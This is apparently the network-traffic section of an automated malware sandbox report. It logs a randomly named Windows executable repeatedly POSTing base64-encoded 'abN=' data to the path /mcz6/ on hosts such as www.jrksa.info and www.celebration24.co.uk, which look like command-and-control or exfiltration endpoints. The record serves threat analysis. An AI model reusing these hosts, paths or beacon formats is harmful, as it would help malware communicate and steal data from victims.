22	192.168.2.4	49766	136.143.186.12	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:07:12.072952986 CEST	750	OUT	POST /mcz6/ HTTP/1.1 Host: www.jrksa.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.jrksa.info Referer: http://www.jrksa.info/mcz6/ Connection: close Content-Length: 220 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 30 66 58 2f 33 56 6a 38 6b 36 47 39 58 54 2b 49 75 71 72 34 69 52 48 36 72 75 63 48 34 42 34 71 43 6c 2f 66 6b 6b 57 58 77 70 34 76 68 51 6e 48 73 66 46 59 68 39 71 62 79 4b 6a 41 6d 49 45 38 69 65 79 50 73 31 6f 58 76 50 55 78 67 4a 53 42 78 74 4a 6e 73 47 54 4f 7a 48 75 30 69 34 32 32 69 57 6c 49 39 7a 4c 47 53 64 44 79 59 4d 45 65 54 44 70 30 79 45 74 74 64 69 66 46 59 4b 33 46 51 56 35 42 56 44 49 35 50 58 43 64 6b 54 44 6b 67 66 45 68 69 39 45 78 37 65 36 4b 52 65 63 50 4d 6e 79 36 55 43 31 48 6f 72 64 36 61 7a 4c 66 35 61 4d 48 4a 30 55 6f 61 2b 30 4e 66 6f 52 32 39 58 43 68 4c 32 67 32 71 79 69 37 4d 66 6d 79 45 6b 4b 4a 74 78 4d 3d Data Ascii: abN=0fX/3Vj8k6G9XT+Iuqr4iRH6rucH4B4qCl/fkkWXwp4vhQnHsfFYh9qbyKjAmIE8ieyPs1oXvPUxgJSBxtJnsGTOzHu0i422iWlI9zLGSdDyYMEeTDp0yEttdifFYK3FQV5BVDI5PXCdkTDkgfEhi9Ex7e6KRecPMny6UC1Hord6azLf5aMHJ0Uoa+0NfoR29XChL2g2qyi7MfmyEkKJtxM=
Jun 5, 2024 15:07:12.822194099 CEST	1236	IN	HTTP/1.1 404 Server: ZGS Date: Wed, 05 Jun 2024 13:07:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: 8ae64e9492=d2341ff8556820e5fe7583c4c06e32ae; Path=/ Set-Cookie: csrfc=195e6428-255c-4604-b499-d83e59f9d7b4;path=/;priority=high Set-Cookie: _zcsr_tmp=195e6428-255c-4604-b499-d83e59f9d7b4;path=/;SameSite=Strict;priority=high Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT vary: accept-encoding Content-Encoding: gzip Data Raw: 35 36 63 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cd 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 c8 92 25 2b 76 14 d9 c1 9a 0c c5 9e 3a 20 03 86 0d 7b a1 25 ca e2 42 89 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 92 e5 69 76 03 8b e2 b9 f1 7c df 39 24 1b 7d b8 fd 7e f3 db 1f bf fe 8c 32 95 b3 d5 0f 51 f5 83 10 8a 32 82 13 f3 a4 07 39 51 18 15 38 27 4b 4b f0 35 57 d2 42 31 2f 14 29 d4 d2 2a 38 2d 12 b2 3f 47 05 4f 39 63 7c a7 9f b0 88 33 fa 40 f4 a3 2c 68 59 12 65 21 e7 68 4e 51 c5 c8 ea 4f 9e f1 c8 a9 9e 0f 33 8c 16 f7 48 3d 96 e0 48 91 bd 72 62 09 ae 04 61 4b 4b aa 47 46 64 46 b4 a5 4c 90 74 69 39 3b b2 4e 21 0a 79 9d e2 9c b2 c7 e5 f7 92 14 3f de e1 42 86 33 d7 3d bf 70 5d eb 68 d7 68 1f 46 f0 59 f3 e4 f1 f9 34 84 8f b6 64 57 86 42 4b 5b 42 da 92 75 8e 24 fc d8 92 08 9a 5e f5 15 24 7d 22 e1 74 5a ee db 73 39 16 1b 5a 84 2e bc 47 ad 89 12 27 09 2d 36 03 33 6b 1c df 6f 04 df 16 89 1d 73 c6 45 78 96 06 fa db 30 fc cf e9 71 a2 78 79 a3 c5 e4 f3 88 95 10 d9 39 7f b2 21 a1 04 0b 7b 23 70 42 01 ae cf 8c a4 ea 1c 9d a5 [TRUNCATED] Data Ascii: 56cX[o6~`h%+v: {%BINRkiv\|9$}~2Q29Q8'KK5WB1/)8-?GO9c\|3@,hYe!hNQO3H=HrbaKKGFdFLti9;N!y?B3=p]hhFY4dWBK[Bu$^$}"tZs9Z.G'-63kosEx0qxy9!{#pBl'xz=pgs?h#34]5u?~],=[2B7M,rL`cGHe4<g.;o]c9/0~EBBuIh[2},t;s?V\|j`8V!N2\|X`-M1lbq\h#:5&b> QF^@3z]EgFlK1(KUA5,Uy@/l49^FMf#
Jun 5, 2024 15:07:12.822225094 CEST	715	IN	Data Raw: fc 31 b8 74 91 bf 07 8e 37 81 fa 5a be 27 95 00 ec b3 cf e3 39 81 d9 e6 26 d7 54 4f b8 6e 9a 55 a7 e9 58 a8 bb 8f ee e1 b7 c1 98 be d1 a6 45 ca 47 ca c4 24 7c 36 5e 6a 47 7d c4 28 ea da 68 c2 7e f1 02 64 9a ad 80 5b 67 9a 51 09 da fa bc 01 e9 2d Data Ascii: 1t7Z'9&TOnUXEG$\|6^jG}(h~d[gQ-$t86mwMOwKk/2?P9_]o=y+8Zo*^N0bV]s]$=OT[$pg?vQo2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49767	136.143.186.12	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:07:14.610538960 CEST	10832	OUT	POST /mcz6/ HTTP/1.1 Host: www.jrksa.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.jrksa.info Referer: http://www.jrksa.info/mcz6/ Connection: close Content-Length: 10300 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 30 66 58 2f 33 56 6a 38 6b 36 47 39 58 54 2b 49 75 71 72 34 69 52 48 36 72 75 63 48 34 42 34 71 43 6c 2f 66 6b 6b 57 58 77 70 77 76 69 6c 7a 48 74 38 64 59 67 39 71 62 36 71 6a 44 6d 49 46 2b 69 65 71 4c 73 31 74 6f 76 4e 38 78 76 4b 71 42 67 75 52 6e 33 32 54 4f 75 33 75 33 76 59 33 32 69 53 35 4d 39 7a 62 47 53 64 44 79 59 50 73 65 51 57 46 30 69 30 74 69 55 43 66 42 63 4b 33 74 51 56 68 52 56 44 38 44 50 48 69 64 6e 7a 54 6b 6a 71 51 68 74 39 45 7a 34 65 36 43 52 65 51 4d 4d 6a 54 44 55 43 78 74 6f 73 56 36 65 6e 61 48 6b 72 34 38 58 56 4d 4c 45 50 41 50 51 6f 46 47 33 6e 32 4f 44 44 41 52 33 43 37 55 49 75 37 4a 58 56 44 49 2b 47 2b 32 58 7a 4a 76 37 33 2f 68 51 6e 6a 63 6f 75 35 63 4f 66 4f 72 64 75 4b 68 2b 4a 34 43 39 47 41 33 55 7a 74 4f 37 4f 2b 49 69 62 4e 43 42 6c 73 58 36 74 57 6c 76 55 37 4d 62 69 5a 38 34 34 59 65 51 32 6e 4c 78 78 30 4b 47 4a 4b 54 57 54 53 73 75 78 6b 6e 39 65 6b 76 46 45 49 6f 56 30 39 55 61 44 38 63 61 52 52 6c 63 62 32 66 51 43 6f 39 37 50 42 5a 6e 41 [TRUNCATED] Data Ascii: abN=0fX/3Vj8k6G9XT+Iuqr4iRH6rucH4B4qCl/fkkWXwpwvilzHt8dYg9qb6qjDmIF+ieqLs1tovN8xvKqBguRn32TOu3u3vY32iS5M9zbGSdDyYPseQWF0i0tiUCfBcK3tQVhRVD8DPHidnzTkjqQht9Ez4e6CReQMMjTDUCxtosV6enaHkr48XVMLEPAPQoFG3n2ODDAR3C7UIu7JXVDI+G+2XzJv73/hQnjcou5cOfOrduKh+J4C9GA3UztO7O+IibNCBlsX6tWlvU7MbiZ844YeQ2nLxx0KGJKTWTSsuxkn9ekvFEIoV09UaD8caRRlcb2fQCo97PBZnA02REbE1duqlJYyyNHetqnjtNlkyDmboboIQTEmyCzXkW/Djw7mMvj4jYZSEAa0bjv5rlHoJl6R9OHqonqXQJZz7EVWG2atpEQRN+cZeS9at2mMek/LOobQQjJ4CNXxqIgXbjWo6AqxcsH9p+PILAuKOAbBFz9lnkFTFfBWvG+9Vhb/3xp6kg3BHOfT4sDvYCrd3oElAXGmLje805pU6HJ/5AC7FZfxGy3HKQIkJd7iNsPiI3j+h8K+LiyX0oqIsPpbcCK3wAGLX10tlxqVU8Lk7Y2M3ib+zgy1QGCnevdhPitGi0rvfnSqPcnCTVVztRFbkzvplidNp37z9uG08vd4SBbs6g4rdqt/E37UvaUA9iHHWQKtylPVVMVXkL/YT1hSRrX7q9TmtIX21QRps1/2Dm3lnUXaO86IhkzL/xZvzFqAalK+D43nnzRNIVAa/A1WZsGQcNVE88Mfg0h8qGc3SFl1kA9nP7J9VIeq9xWk/I7YSGZczIbYOfJ6iyGBDc165zYoBB8+B/tXAyv6Ed0pQ1IxGZej5HYh7moSfTyjCD2yXoutM762oZ20oZUhrqqGOmTjrR72/y5KEBjf2SChyIlR1us6p5xCrAgcCCGNYZWo3dYY33/lzz08Vl+4eYqS2Q4EX5aa7tBHA37GTjdlmfYkqSaprIq2 [TRUNCATED]
Jun 5, 2024 15:07:15.348826885 CEST	544	IN	HTTP/1.1 400 Server: ZGS Date: Wed, 05 Jun 2024 13:07:15 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Length: 80 Connection: close Set-Cookie: 8ae64e9492=9a53152e40f8a6327f1486af29c1a1cb; Path=/ Set-Cookie: csrfc=9c6dd04c-f545-491a-929e-fd9c9d3b14c0;path=/;priority=high Set-Cookie: _zcsr_tmp=9c6dd04c-f545-491a-929e-fd9c9d3b14c0;path=/;SameSite=Strict;priority=high Set-Cookie: JSESSIONID=EA21636394C21E81102B520C1156912E; Path=/; HttpOnly Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 5f 63 6f 64 65 22 3a 22 34 30 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 22 31 22 2c 22 64 65 76 65 6c 6f 70 65 72 5f 6d 65 73 73 61 67 65 22 3a 22 49 6e 76 61 6c 69 64 20 69 6e 70 75 74 2e 22 7d 0a 0a Data Ascii: {"response_code":"400","status_code":"1","developer_message":"Invalid input."}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49768	136.143.186.12	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:07:17.141134977 CEST	476	OUT	GET /mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=5d/f0hfwoo/9d3f97tbdjxDk4KU85C4YC37M3UWhy4ALmXvbgMxGv66I6qe5jd4u2tKoxygbv/cknJWC1exftQvP2lviqJawgXV46wbQMN+Gc/xUQSNa8ks= HTTP/1.1 Host: www.jrksa.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 5, 2024 15:07:17.882740021 CEST	1236	IN	HTTP/1.1 404 Server: ZGS Date: Wed, 05 Jun 2024 13:07:17 GMT Content-Type: text/html Content-Length: 4635 Connection: close Set-Cookie: 8ae64e9492=9a53152e40f8a6327f1486af29c1a1cb; Path=/ Set-Cookie: csrfc=03af9506-face-41b1-a80a-0813a59bba89;path=/;priority=high Set-Cookie: _zcsr_tmp=03af9506-face-41b1-a80a-0813a59bba89;path=/;SameSite=Strict;priority=high Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT vary: accept-encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0
Jun 5, 2024 15:07:17.882798910 CEST	1236	IN	Data Raw: 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 34 35 32 Data Ascii: 086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:452px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{ margin-top:
Jun 5, 2024 15:07:17.882833958 CEST	1236	IN	Data Raw: 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 3b 0a 20 20 20 20 20 20 20 20 20 Data Ascii: h3{ font-size:18px; font-family: "Open Sans"; font-weight:normal; font-weight:600; } .weight400{ font-weight:400; } .domain-color{
Jun 5, 2024 15:07:17.882870913 CEST	1236	IN	Data Raw: 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 20 20 0a 20 20 Data Ascii: (0, 0, 0, 0.12); color: #ffffff; font-size: 18px; font-weight: 300; padding: 10px 20px; text-decoration: none; position:relative; } </style>
Jun 5, 2024 15:07:17.882901907 CEST	212	IN	Data Raw: 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 77 69 64 74 68 3d 22 37 30 30 70 78 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 7a 6f 68 6f 2e 63 6f 6d 2f 73 69 74 65 73 2f 69 6d 61 67 65 73 2f 70 72 Data Ascii: <img width="700px" src="https://www.zoho.com/sites/images/professionally-crafted-themes.png" style="margin-top: 15px"> </div> </div> </div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49769	103.168.172.37	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:07:31.252003908 CEST	757	OUT	POST /mcz6/ HTTP/1.1 Host: www.celebration24.co.uk Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.celebration24.co.uk Referer: http://www.celebration24.co.uk/mcz6/ Connection: close Content-Length: 200 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 62 4f 55 34 4b 74 5a 31 4d 32 68 57 63 75 62 72 52 34 76 64 4f 32 66 61 38 4e 62 4b 4e 47 59 73 70 6d 42 7a 6b 50 72 64 44 59 38 68 62 45 30 48 56 68 5a 37 53 30 5a 4e 43 6d 78 6e 2f 4c 34 48 34 55 35 69 37 76 37 64 6b 51 4e 35 76 71 6f 56 77 4a 2b 56 6f 47 52 54 66 73 77 57 7a 79 30 79 4a 7a 61 58 48 37 7a 4e 57 58 6f 7a 36 2b 31 73 63 32 75 6e 6c 54 42 52 33 45 2b 72 7a 61 6e 71 6c 32 6d 56 50 67 41 61 49 64 47 34 50 68 72 58 41 4c 31 33 6d 6e 78 35 56 2b 6d 41 52 76 76 42 4f 79 5a 35 68 4d 78 59 6c 79 79 47 47 6e 61 6b 37 2b 79 4a 77 37 2b 4e 32 68 70 64 71 4c 30 6d 59 41 3d 3d Data Ascii: abN=bOU4KtZ1M2hWcubrR4vdO2fa8NbKNGYspmBzkPrdDY8hbE0HVhZ7S0ZNCmxn/L4H4U5i7v7dkQN5vqoVwJ+VoGRTfswWzy0yJzaXH7zNWXoz6+1sc2unlTBR3E+rzanql2mVPgAaIdG4PhrXAL13mnx5V+mARvvBOyZ5hMxYlyyGGnak7+yJw7+N2hpdqL0mYA==
Jun 5, 2024 15:07:31.933795929 CEST	570	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 05 Jun 2024 13:07:31 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close x-backend: web4 X-Frontend: frontend1 X-Trace-Id: ti_8e90bb3ee2fe74bab89e36a68cedf695 Content-Encoding: br Data Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=\|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49770	103.168.172.37	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:07:33.876705885 CEST	777	OUT	POST /mcz6/ HTTP/1.1 Host: www.celebration24.co.uk Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.celebration24.co.uk Referer: http://www.celebration24.co.uk/mcz6/ Connection: close Content-Length: 220 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 62 4f 55 34 4b 74 5a 31 4d 32 68 57 66 4e 54 72 54 62 48 64 5a 6d 65 6f 35 4e 62 4b 61 57 59 6f 70 6d 64 7a 6b 4b 4c 4e 57 37 49 68 59 67 77 48 55 67 5a 37 52 30 5a 4e 4e 47 78 69 37 4c 34 4d 34 55 45 56 37 75 48 64 6b 51 5a 35 76 72 59 56 78 36 47 53 75 57 52 52 54 4d 77 59 39 53 30 79 4a 7a 61 58 48 37 6d 6f 57 58 67 7a 36 75 46 73 4f 55 47 6b 6d 54 42 57 6a 55 2b 72 33 61 6e 75 6c 32 6d 33 50 6a 45 38 49 62 43 34 50 68 62 58 4f 36 31 34 76 6e 78 37 4b 75 6e 38 63 75 76 46 55 41 70 77 38 75 74 64 6a 6d 71 2f 4b 42 4c 2b 71 50 54 65 69 37 61 2b 72 6d 67 70 6e 49 4a 76 44 49 6a 44 66 6c 71 52 5a 67 39 78 71 7a 51 74 77 77 44 34 30 46 77 3d Data Ascii: abN=bOU4KtZ1M2hWfNTrTbHdZmeo5NbKaWYopmdzkKLNW7IhYgwHUgZ7R0ZNNGxi7L4M4UEV7uHdkQZ5vrYVx6GSuWRRTMwY9S0yJzaXH7moWXgz6uFsOUGkmTBWjU+r3anul2m3PjE8IbC4PhbXO614vnx7Kun8cuvFUApw8utdjmq/KBL+qPTei7a+rmgpnIJvDIjDflqRZg9xqzQtwwD40Fw=
Jun 5, 2024 15:07:34.552422047 CEST	570	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 05 Jun 2024 13:07:34 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close x-backend: web4 X-Frontend: frontend1 X-Trace-Id: ti_f018a453e4ef277c5677f4d4912cf357 Content-Encoding: br Data Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=\|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49771	103.168.172.37	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:07:36.409290075 CEST	10859	OUT	POST /mcz6/ HTTP/1.1 Host: www.celebration24.co.uk Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.celebration24.co.uk Referer: http://www.celebration24.co.uk/mcz6/ Connection: close Content-Length: 10300 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 62 4f 55 34 4b 74 5a 31 4d 32 68 57 66 4e 54 72 54 62 48 64 5a 6d 65 6f 35 4e 62 4b 61 57 59 6f 70 6d 64 7a 6b 4b 4c 4e 57 36 77 68 62 54 34 48 56 44 42 37 51 30 5a 4e 45 6d 78 6a 37 4c 34 64 34 55 63 52 37 75 4b 6d 6b 53 68 35 76 4e 45 56 32 4c 47 53 6e 57 52 52 62 73 77 5a 7a 79 30 6e 4a 7a 71 62 48 37 32 6f 57 58 67 7a 36 73 4e 73 59 32 75 6b 67 54 42 52 33 45 2b 64 7a 61 6e 43 6c 32 76 41 50 67 6f 4b 49 49 4b 34 50 46 33 58 43 6f 64 34 6b 6e 78 39 4c 75 6e 6b 63 72 32 62 55 41 6b 4a 38 76 5a 33 6a 68 4b 2f 41 48 69 67 76 74 44 30 2f 37 4c 6e 2f 30 55 79 72 35 39 72 44 59 76 33 52 56 6e 46 44 6b 35 53 6e 52 4a 5a 71 56 54 30 69 79 68 42 56 37 59 4a 65 34 31 31 72 6a 69 69 48 51 30 38 71 4d 52 53 58 59 74 34 43 79 6d 37 51 6c 36 6e 30 4c 61 7a 4a 43 77 56 6f 32 4f 48 35 4f 2b 55 77 6b 32 31 71 4d 61 74 38 4d 52 54 51 78 48 78 53 63 50 68 77 45 37 55 72 65 4c 2b 2f 48 75 31 64 6c 76 34 41 4b 32 44 34 41 45 5a 4b 6f 44 74 76 6c 53 79 54 38 37 42 56 76 6e 79 34 63 72 4a 58 6f 59 35 79 73 [TRUNCATED] Data Ascii: 